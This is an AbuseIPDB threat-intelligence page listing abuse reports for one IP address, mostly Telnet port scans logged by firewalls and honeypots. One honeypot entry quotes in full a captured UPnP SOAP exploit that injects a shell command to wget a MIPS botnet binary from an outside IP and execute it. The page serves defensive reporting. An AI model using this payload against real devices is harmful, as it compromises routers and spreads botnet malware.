JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 4.184.118.54

4.184.118.54 was found in our database!

This IP was reported 35 times. Confidence of Abuse is 100%: ?

100%

ISP	Microsoft Corporation
Usage Type	Data Center/Web Hosting/Transit
ASN	AS8075
Domain Name	microsoft.com
Country	🇩🇪 Germany
City	Frankfurt am Main, Hesse

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 4.184.118.54

Whois 4.184.118.54

IP Abuse Reports for 4.184.118.54:

This IP address has been reported a total of 35 times from 27 distinct sources. 4.184.118.54 was first reported on June 16th 2026, and the most recent report was 7 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 andypiper	2026-06-18 01:01:02 (7 hours ago)	CrowdSec ban for AbuseIPDB Top List	Brute-Force Web App Attack
🇺🇸 xmission.com	2026-06-18 00:15:23 (8 hours ago)	Blocked by UFW (TCP on 23) Source port: 37900 TTL: 38 Packet length: 40 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 37900 TTL: 38 Packet length: 40 TOS: 0x00 This report (for 4.184.118.54) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇬🇧 gbzret4d	2026-06-17 23:33:56 (8 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇺🇸 MPL	2026-06-17 22:49:09 (9 hours ago)	tcp/23	Port Scan
🇦🇹 urnilxfgbez	2026-06-17 22:45:00 (9 hours ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇺🇸 RAP	2026-06-17 18:48:44 (13 hours ago)	2026-06-17 18:48:44 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇺🇸 sumnone	2026-06-17 18:47:19 (13 hours ago)	Port probing on unauthorized port 23	Port Scan Hacking Exploited Host
🇫🇷 security.rdmc.fr	2026-06-17 18:44:27 (13 hours ago)	Port Scan Attack proto:TCP src:37900 dst:23	Port Scan
🇳🇱 ByeByte API	2026-06-17 18:42:22 (13 hours ago)	byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-17T18:42:22Z. Source por ... show more byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-17T18:42:22Z. Source port 64524. TCP flags: SYN. Packet: 40B, TTL 47, window 48983, IP id 56267. Single packet, dropped at firewall. p0f: 17 hops. show less	Port Scan
🇩🇪 dispaisyenterprises	2026-06-17 17:29:06 (14 hours ago)	Honeypot [fra-de-honeypot]: Unauthorized connection attempt detected on 23/TELNET Reported by DisPai ... show more Honeypot [fra-de-honeypot]: Unauthorized connection attempt detected on 23/TELNET Reported by DisPaisy Enterprises (dispaisy.systems) using: https://github.com/sefinek/T-Pot-To-AbuseIPDB show less	Hacking Port Scan
🇺🇸 xmission.com	2026-06-17 16:30:21 (15 hours ago)	Blocked by UFW (TCP on 23) Source port: 48922 TTL: 38 Packet length: 40 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 48922 TTL: 38 Packet length: 40 TOS: 0x00 This report (for 4.184.118.54) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇺🇸 RAP	2026-06-17 14:12:56 (18 hours ago)	2026-06-17 14:12:56 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇷🇺 genokrad	2026-06-17 13:25:24 (18 hours ago)	Unauthorized connection try on TCP/23 (Telnet)	Port Scan
🇳🇱 BIV	2026-06-17 13:07:19 (19 hours ago)	Honeypot multi-source hit. Sources: tpot:Cowrie,tpot:P0f,tpot:Suricata. Ports: 23. Automated tiered ... show more Honeypot multi-source hit. Sources: tpot:Cowrie,tpot:P0f,tpot:Suricata. Ports: 23. Automated tiered (T-Pot+DShield). show less	Port Scan Hacking Brute-Force SSH
🇧🇾 sashan	2026-06-17 12:03:07 (20 hours ago)	2026-06-17T15:02:52.452169+03:00 gate kernel: nftables: JAIL-TELNET IN=wan OUT= MAC= SRC=4.184.118.5 ... show more 2026-06-17T15:02:52.452169+03:00 gate kernel: nftables: JAIL-TELNET IN=wan OUT= MAC= SRC=4.184.118.54 DST=xxx.xxx.xxx.xxx LEN=40 TOS=0x00 PREC=0x00 TTL=50 ID=5953 PROTO=TCP SPT=29642 DPT=23 WINDOW=52668 RES=0x00 SYN URGP=0 ... show less	Port Scan

Showing 1 to 15 of 35 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 217.160.182.203

🇩🇪 213.209.159.226

🇰🇷 175.118.127.138

🇺🇸 143.42.1.44

🇨🇳 120.48.122.158

🇮🇩 103.174.62.20

🇳🇱 91.92.40.13

🇵🇱 87.251.64.144

🇨🇦 85.217.149.8

🇷🇺 45.90.218.192

🇫🇷 37.58.136.133

🇩🇪 213.209.159.225

🇺🇬 196.0.120.6

🇷🇺 188.17.148.221

🇩🇪 178.27.61.137

🇺🇸 166.1.60.230

🇭🇰 165.154.6.75

🇮🇩 160.187.174.22

🇫🇷 158.220.125.127

🇭🇰 150.5.131.119